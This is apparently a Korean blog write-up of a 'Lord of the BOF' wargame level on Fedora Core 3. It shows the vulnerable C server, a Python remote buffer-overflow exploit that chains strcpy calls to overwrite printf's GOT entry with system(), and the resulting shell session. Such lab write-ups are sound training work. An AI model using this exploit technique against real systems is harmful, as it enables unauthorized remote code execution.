문제의 소스입니다.
[evil_wizard@Fedora_1stFloor tmp]$ cat ../dark_stone.c
/*
The Lord of the BOF : The Fellowship of the BOF
- dark_stone
- Remote BOF on Fedora Core 3
- hint : GOT overwriting again
- port : TCP 8888
*/
#include <stdio.h>
// magic potion for you
void pop_pop_ret(void)
{
asm("pop %eax");
asm("pop %eax");
asm("ret");
}
int main()
{
char buffer[256];
char saved_sfp[4];
int length;
char temp[1024];
printf("dark_stone : how fresh meat you are!\n");
printf("you : ");
fflush(stdout);
// give me a food
fgets(temp, 1024, stdin);
// for disturbance RET sleding
length = strlen(temp);
// save sfp
memcpy(saved_sfp, buffer+264, 4);
// overflow!!
strcpy(buffer, temp);
// restore sfp
memcpy(buffer+264, saved_sfp, 4);
// disturbance RET sleding
memset(buffer+length, 0, (int)0xff000000 - (int)(buffer+length));
// buffer cleaning
memset(0xf6ffe000, 0, 0xf7000000-0xf6ffe000);
printf("%s\n", buffer);
}
저번 문제와 똑같은 문제지만 저번 문제와 이번문제의 차이는 저번 문제는 local 환경이었고, 이번 문제는 remote환경 이라는 것입니다.
문제 - 4 : http://windowhan.tistory.com/entry/hellfire-evilwizard (저번 문제와 똑같이 풀었습니다.)
제가 쓴 소스입니다.
[evil_wizard@Fedora_1stFloor tmp]$ cat ex.py
#!/usr/bin/python
from struct import pack
import os
printf_plt = 0x08048408
printf_got = 0x0804984c
strcpy_plt = 0x08048438
garget1 = 0x08048484 #0xc0
garget2 = 0x0804838c #0x07
garget3 = 0x080482b4 #0x75
garget4 = 0x0804982c #0x00
b_garget1 = 0x0804872d #h
b_garget2 = 0x08048287 #s
b_garget3 = 0x08048114 #/
b_garget4 = 0x08048720 #n
b_garget5 = 0x0804811d #i
b_garget6 = 0x08048117 #b
b_garget7 = 0x08048114 #/
b_garget8 = 0x0804982c #\x00
func_stack = 0x08049874 #system function address
binsh_stack = 0x8049980 #/bin/sh address
final_binsh_stack = 0x08049ad0
ppr = 0x080484f3 #pop;pop;ret
binsh = 0x00833603 #"/bin/sh"
p = lambda x : pack("<L",x)
payload = ""
payload += "\x90"*268
payload += p(strcpy_plt) + p(ppr) + p(func_stack+0) + p(garget1)
payload += p(strcpy_plt) + p(ppr) + p(func_stack+1) + p(garget2)
payload += p(strcpy_plt) + p(ppr) + p(func_stack+2) + p(garget3)
payload += p(strcpy_plt) + p(ppr) + p(func_stack+3) + p(garget4)
#payload += p(strcpy_plt) + p(ppr) + p(func_stack+4) + p(b_garget8)
#payload += p(strcpy_plt) + p(ppr) + p(func_stack+5) + p(b_garget8)
#payload += p(strcpy_plt) + p(ppr) + p(func_stack+6) + p(b_garget8)
#payload += p(strcpy_plt) + p(ppr) + p(func_stack+7) + p(b_garget8)
payload += p(strcpy_plt) + p(ppr) + p(printf_got) + p(func_stack)
payload += p(printf_plt) + "\x90"*4 + p(binsh)
print payload
=========================================================================
[evil_wizard@Fedora_1stFloor tmp]$ (python ex.py;cat)|nc localhost 8888
dark_stone : how fresh meat you are!
you :
id
uid=505(dark_stone) gid=505(dark_stone) context=user_u:system_r:unconfined_t
my-ps^Hass
/bin/sh: line 3: my-pass: command not found
my-pass
euid = 505
let there be light
==========================================================================
[dark_stone@Fedora_1stFloor ~]$ ls
dropped_item.txt
[dark_stone@Fedora_1stFloor ~]$ cat dropped_item.txt
,.
,' `.
,' _<>_ `.
,'.-'____`-.`.
,'_.-'' ``-._`.
,',' /\ `.`.
,' /.._ O / \ O _.,\ `.
,'/ / \ ``-;.--.:-'' / \ \`.
,' : : \ /\`.,'/\ / : : `.
< <>| | O >(< ( ) >)< O | |<> >
`. : : / \/,'`.\/ \ ; ; ,'
`.\ \ /_..-:`--';-.._\ / /,'
`. \`' O \ / O `'/ ,'
`.`._ \/ _,','
`..``-.____.-'',,'
`.`-.____.-','
`. <> ,'
`. ,'
`'
==================================================================
07을 찾아야했는데 00을 찾아서 넣어주고 있었네요...
원래 system 함수의 주소는 0x7507c0 인데 0x7500c0으로 넣어서 엉뚱한곳을 실행시키고있었다는..하하..-_-;;
보스몹이 쥐고있던 아이템을 획득했습니다 ㅋㅋ
'Wargame > LOB (Fedora3)' 카테고리의 다른 글
| hell_fire -> evil_wizard (0) | 2014.02.20 |
|---|---|
| dark_eyes -> hell_fire (1) | 2014.02.20 |
| iron_golem -> dark_eyes (0) | 2014.02.20 |
| gate -> iron_golem (0) | 2014.02.20 |
